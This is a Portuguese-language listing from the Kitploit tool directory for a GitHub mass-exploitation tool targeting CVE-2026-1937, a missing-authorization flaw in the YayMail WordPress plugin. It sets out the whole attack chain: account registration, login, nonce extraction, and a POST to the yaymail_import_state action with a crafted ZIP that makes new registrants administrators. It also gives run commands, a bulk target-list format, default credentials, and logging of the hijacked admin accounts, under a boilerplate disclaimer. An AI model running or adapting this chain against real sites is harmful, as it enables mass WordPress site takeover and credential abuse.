Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1937 — YayMail <= 4.3.2 - Autorização Ausente para Atualização Arbitrária de Opções por Usuários Autenticados (Shop Manager+) através da Ação AJAX 'yaymail_import_state' | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-1937
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2026-1937

CVE-2026-1937

YayMail <= 4.3.2 - Autorização Ausente para Atualização Arbitrária de Opções por Usuários Autenticados (Shop Manager+) através da Ação AJAX 'yaymail_import_state'

Ver Repositório
3há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Typing SVG


🔴 Visão Geral da Vulnerabilidade

CVE-2026-1937 — Autorização Ausente → Atualização Arbitrária de Opções → Escalação de Privilégios

Descrição:
O plugin YayMail – WooCommerce Email Customizer para WordPress é vulnerável à modificação não autorizada de dados que leva à Escalação de Privilégios em todas as versões até a 4.3.2 inclusive. A ação AJAX yaymail_import_state é registrada sem qualquer verificação de capacidade no servidor, permitindo que atacantes autenticados com acesso de nível Shop Manager ou superior a invoquem livremente. Ao enviar um arquivo ZIP de importação especialmente elaborado, o atacante pode sobrescrever silenciosamente opções arbitrárias do site WordPress — incluindo definir o papel padrão de registro de novos usuários como administrator e habilitar o registro público aberto. Uma vez que essas opções são injetadas, qualquer visitante pode se registrar no site e receber uma conta completa de Administrador do WordPress, resultando em comprometimento total do site.


🛠️ Descrição da Ferramenta

Esta é uma cadeia de exploração em massa Proof-of-Concept (PoC) direcionada a instalações WordPress + WooCommerce que executam uma versão vulnerável do plugin YayMail. A ferramenta implementa um ataque completo de ponta a ponta: registro no WooCommerce → login → extração do nonce do YayMail → exploração do yaymail_import_state → verificação de administrador.

🔗 Cadeia de Ataque Completa

root@kitploit:~
[Phase 1 — Registration]
  GET  /my-account/  →  Extract WooCommerce register nonce
  POST /my-account/  →  Register new account (WooCommerce form)
  → Save credentials to reg.txt

          ↓

[Phase 2 — Login]
  POST /wp-login.php         →  Try WordPress native login
  POST /my-account/ (WooC.)  →  Fallback WooCommerce login
  → Establish authenticated session

          ↓

[Phase 3 — Admin Pre-check]
  GET /wp-admin/  →  If already admin, skip to result

          ↓

[Phase 4 — YayMail Exploit]
  GET /wp-admin/admin.php?page=yaymail-settings
  → Extract: ajax_url + nonce

  POST /wp-admin/admin-ajax.php
  action=yaymail_import_state
  nonce=<extracted_nonce>
  import_file=yaymail_backup.zip
  → Override WordPress options:
    · default_role = administrator
    · users_can_register = 1

          ↓

[Phase 5 — Admin Verification]
  GET /wp-admin/        → Check adminmenu / wp-admin-bar
  GET /wp-admin/users.php   → Confirm manage_options access

          ↓

[Save to Nx_admin.txt]
  Format: [timestamp] https://target.com user:<u> pass:<p>

📋 Requisitos

Requisitos do Sistema

  • Python 3.8 ou superior
  • Linux / Windows / macOS
  • yaymail_backup.zip — payload de importação elaborado (obrigatório)

Dependências Python

root@kitploit:~
pip install requests urllib3 rich

Ou via arquivo de requisitos:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1937.git
cd CVE-2026-1937

# Install dependencies
pip install -r requirements.txt

# Place your crafted import payload in the same directory
cp /path/to/yaymail_backup.zip .

# Run the tool
python3 CVE-2026-1937.py

⚙️ Uso

Execução Básica

root@kitploit:~
python3 CVE-2026-1937.py

A ferramenta usa uma interface de terminal totalmente interativa alimentada por Rich.


🗂️ Formato da Lista de Alvos

Crie um arquivo de texto simples (padrão: list.txt) — um alvo por linha:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com
target4.com

Alvos sem http:// ou https:// recebem automaticamente o prefixo https://.


🖥️ Prompts Interativos

root@kitploit:~
Username   [Nx_admin]:          Nx_admin
Password   [Nx_adminSA]:        Nx_adminSA
Email      [[email protected]]: [email protected]
Targets file [list.txt]:        list.txt
Threads [3]:                    5
HTTP timeout (seconds) [10]:    10

📦 Arquivo de Payload — yaymail_backup.zip

A exploração requer um arquivo ZIP de importação YayMail especialmente elaborado que sobrescreve as seguintes opções do WordPress quando importado:

Opção do WordPressValor Injetado
default_roleadministrator
users_can_register1

⚠️ A ferramenta se recusará a executar se yaymail_backup.zip não estiver presente no diretório de trabalho.


🔬 Endpoint AJAX Vulnerável

root@kitploit:~
POST /wp-admin/admin-ajax.php
root@kitploit:~
action=yaymail_import_state
nonce=<extracted_from_yaymail_settings_page>
import_file=yaymail_backup.zip  (multipart upload)

Causa Raiz:
O manipulador yaymail_import_state não chama current_user_can() nem qualquer verificação de capacidade equivalente antes de processar a importação. Qualquer usuário com o papel shop_manager (ou superior) pode invocar esta ação livremente e sobrescrever entradas arbitrárias da tabela wp_options por meio do mecanismo de importação ZIP.


🔍 Páginas WooCommerce Verificadas

A ferramenta verifica automaticamente os seguintes caminhos em busca dos formulários de registro e login:

root@kitploit:~
/my-account/       /my_account/      /My-account/
/account/          /myaccount/       /customer-login/
/login/            /register/        /sss/

📁 Arquivos de Saída

ArquivoDescrição
reg.txtTodos os registros WooCommerce bem-sucedidos com credenciais
Nx_admin.txtTodas as escalações de administrador confirmadas

✅ Formato de Saída

reg.txt:

root@kitploit:~
[2026-03-01 14:22:10] https://target.com user:Nx_admin email:[email protected] pass:Nx_adminSA

Nx_admin.txt:

root@kitploit:~
[2026-03-01 14:22:18] https://target.com user:Nx_admin pass:Nx_adminSA | yaymail import

🖥️ Exemplo de Saída do Terminal

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  WooCommerce · YayMail · Mass Exploit Chain                      ║
║  By: Nxploited  |  GitHub: github.com/Nxploited  |  @Kxploit    ║
╚══════════════════════════════════════════════════════════════════╝

[SCAN]            https://target.com
[REGISTERED]      https://target.com  ::  user: Nx_admin pass: Nx_adminSA
[LOGIN-WP]        https://target.com  ::  wp-login.php
[SEARCH-NONCE]    https://target.com  ::  not admin, trying YayMail chain
[NONCE-FOUND]     https://target.com  ::  nonce: a1b2c3d4e5
[EXPLOIT]         https://target.com  ::  nonce: a1b2c3d4e5
[SUCCESS]         https://target.com  ::  user: Nx_admin pass: Nx_adminSA

┌──────────────────────────────────────���───────────────────────────────────┐
│ Target               │ Status                    │ Credentials / Note    │
├──────────────────────────────────────────────────────────────────────────┤
│ https://target.com   │ ✅ EXPLOITED (ADMIN VERIFIED) │ user: Nx_admin …  │
│ https://target2.com  │ NO-REGISTER               │                       │
│ https://target3.com  │ DEAD                      │                       │
└──────────────────────────────────────────────────────────────────────────┘

📊 Referência de Códigos de Status


📡 Contato e Autor

Por: Nxploited (Khaled Alenazi)

 


⚠️ Aviso Legal

ESTA FERRAMENTA É FORNECIDA APENAS PARA FINS EDUCACIONAIS E DE PESQUISA DE SEGURANÇA AUTORIZADA.

O autor, Nxploited (Khaled Alenazi), e todos os colaboradores deste projeto não aprovam, apoiam nem assumem qualquer responsabilidade pelo uso indevido desta ferramenta ou por qualquer dano causado pelo uso deste software contra sistemas para os quais você não possui autorização explícita por escrito.

  • ✅ Permitido: Uso em sistemas que você possui ou para os quais recebeu permissão explícita por escrito para testar.
  • ❌ Proibido: Uso contra qualquer sistema sem autorização prévia explícita por escrito do proprietário do sistema.

O acesso não autorizado a sistemas de computador é ilegal e punível pelas leis aplicáveis, incluindo, mas não se limitando ao Computer Fraud and Abuse Act (CFAA), ao Computer Misuse Act (CMA) e à legislação equivalente em todo o mundo.

Ao usar esta ferramenta, você aceita total e exclusiva responsabilidade por suas ações e confirma que tem autoridade legal para testar os sistemas-alvo.

O autor não assume nenhuma responsabilidade por quaisquer danos diretos, indiretos, incidentais ou consequenciais decorrentes do uso ou uso indevido deste software.


© 2026 Nxploited (Khaled Alenazi) — Somente para pesquisa de segurança autorizada.

Baixar ferramenta
CampoDetalhes
ID CVECVE-2026-1937
GravidadeALTA — Pontuação CVSS v3.1: 7.2
VetorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
PesquisadorDaniel Basta (whizzu) — NASK PIB
Divulgação Pública17 de fevereiro de 2026
Última Atualização27 de março de 2026
Software AfetadoYayMail – Plugin WooCommerce Email Customizer para WordPress
Versões AfetadasTodas as versões até a 4.3.2 inclusive
Tipo de VulnerabilidadeAutorização Ausente → Atualização Arbitrária Não Autorizada de Opções → Escalação de Privilégios
Autenticação NecessáriaSim — nível Shop Manager ou superior
CWECWE-862: Autorização Ausente
StatusCorSignificado
EXPLOITED (ADMIN VERIFIED)🟢 VerdeSucesso na cadeia completa — administrador confirmado
EXPLOITED (ADMIN)🟢 VerdeUsuário registrado já era administrador
PARTIAL🟡 AmareloImportação YayMail bem-sucedida, mas acesso de administrador não confirmado
REGISTERED🟡 AmareloRegistro WooCommerce bem-sucedido
LOGIN-WP🔵 CianoConectado via /wp-login.php
LOGIN-WOO🔵 CianoConectado via formulário WooCommerce
NONCE-FOUND🟣 MagentaNonce YayMail extraído com sucesso
NO-REGISTER⚫ EscuroFormulário de registro WooCommerce não encontrado
LOGIN-FAILED⚫ EscuroNão foi possível estabelecer sessão autenticada
NONCE-NOT-FOUND⚫ EscuroPágina de configurações do YayMail inacessível ou nonce ausente
EXPLOIT-FAILED🔴 VermelhoA chamada yaymail_import_state não retornou sucesso
TIMEOUT⚫ EscuroTempo limite HTTP
DEAD⚫ EscuroConexão recusada / inacessível
ERROR🔴 VermelhoExceção inesperada